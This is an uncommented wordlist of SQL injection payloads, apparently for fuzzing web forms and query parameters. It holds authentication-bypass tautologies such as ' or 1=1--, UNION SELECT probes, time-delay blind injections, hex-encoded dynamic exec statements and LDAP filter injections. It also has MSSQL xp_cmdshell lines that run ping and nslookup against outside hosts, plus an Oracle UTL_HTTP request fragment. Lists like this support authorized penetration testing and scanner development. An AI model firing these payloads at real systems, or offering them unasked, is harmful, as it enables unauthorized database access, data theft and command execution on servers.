!
"
#
&
'
(
)
*/*
*|
-
--
--';
/
//
//*
<>"'%;)(&+
?
|
 and 1=1
 and 2=0
' and '2'='0
' and '2'='0'-- oracle
 and 2=0-- oracle_mysql
 and 2=0#mysql
' and '2'='0'#mysql
' and '2'='2
' and '2'='2'-- oracle
 and 2=2-- oracle_mysql
 and 2=2#mysql
' and '2'='2'#mysql
 and user()=user()
 and USER=USER
'; exec master..xp_cmdshell
'; exec master..xp_cmdshell 'ping 172.10.1.255'--
'; exec xp_regread
' or ''='
 or 0=0 #"
" or 0=0 #
" or 0=0 --
' or 0=0 #
' or 0=0 --
"' or 1 --'"
' or 1 --'
' or 1=1
" or 1=1#
" or 1=1--
' or '1'='1'--
' or 1=1--
 or 1=1 --
 or 1=1 or ""=
" or 1=1 or ""="
' or 1=1 or ''='
 or 2=2
' or '2'='2
 or a = a
 or a=a
" or "a"="a
") or ("a"="a
' or a=a--
') or ('a'='a
) or (a=a
' or (EXISTS)
' or uid like '%
' or uname like '%
' or user like '%
' or userid like '%
' or username like '%
' (select top 1
' UNION ALL SELECT
' UNION SELECT
0 or 1=1
1 or 1=1
1 waitfor delay '0:0:10'--
1e100
1;SELECT%20*
2' or '2'='2
2 or 2=2
'%20--
'%20;
=%20'
=%20--
=%20;
%20$(sleep%2050)
'%20or%20''='
'%20or%201=1
"%20or%20"x"="x
%20or%20x=x
'%20or%20'x'='x
')%20or%20('x'='x
%20'sleep%2050'
%21
23 OR 1=1
%26
%27%20or%201=1
%28
%29
%2A%28%7C%28mail%3D%2A%29%29
%2A%28%7C%28objectclass%3D%2A%29%29
%2A%7C
%7C
999999999999999999
a'
"a"" or 1=1--"
a' or 1=1--
"a"" or 3=3--"
a' or 3=3--
a' or 'a' = 'a
a' waitfor delay '0:0:10'--
admin'
admin'#
admin'--
anything' OR 'x'='x
&apos;%20OR
as
asc
bfilename
char%4039%41%2b%40SELECT
declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)
declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)
declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s) 
delete
desc
distinct
exec sp
exec xp
handler
having
hi or 1=1 --"
hi" or 1=1 --
hi' or 1=1 --
"hi"") or (""a""=""a"
hi or a=a
hi" or "a"="a
hi") or ("a"="a
hi' or 'a'='a
hi') or ('a'='a
'hi' or 'x'='x';
insert
like
limit
&lt;&gt;&quot;'%;)(&amp;+
*(|(mail=*))
#mysql
'#mysql
now()
*(|(objectclass=*))
or
or 0=0 #
or 0=0 --
or 1=1
or 1=1#
or 1=1--
or%201=1
or%201=1 --
'or%20select *
'/*ora_mysql*/and/**/'2'='0
/*ora_mysql*/and/**/2=0
'/*ora_mysql*/and/**/'2'='2
/*ora_mysql*/and/**/2=2
'/*ora_mysql*/or/**/'2'='2
--ora_sqls
order by
order by 1--
PRINT
PRINT @@variable
procedure
replace
select
--sp_password
'sqlattempt1
(sqlattempt2)
'test
'test--
t'exec master..xp_cmdshell 'nslookup www.google.com'--
to_timestamp_tz
truncate
tz_offset
update
'||UTL_HTTP.REQUEST
,@variable
@variable
x' AND 1=(SELECT COUNT(*) FROM tabname); --
x' AND email IS NULL; --
x' AND members.email IS NULL; --
x' AND userid IS NULL; --
x' or 1=1 or 'x'='y
x' OR full_name LIKE '%Bob%
\x23
\x27
\x27UNION SELECT
\x27\x4F\x52 SELECT *
\x27\x6F\x72 SELECT *
\x3D%20\x27
\x3D%20\x3B'
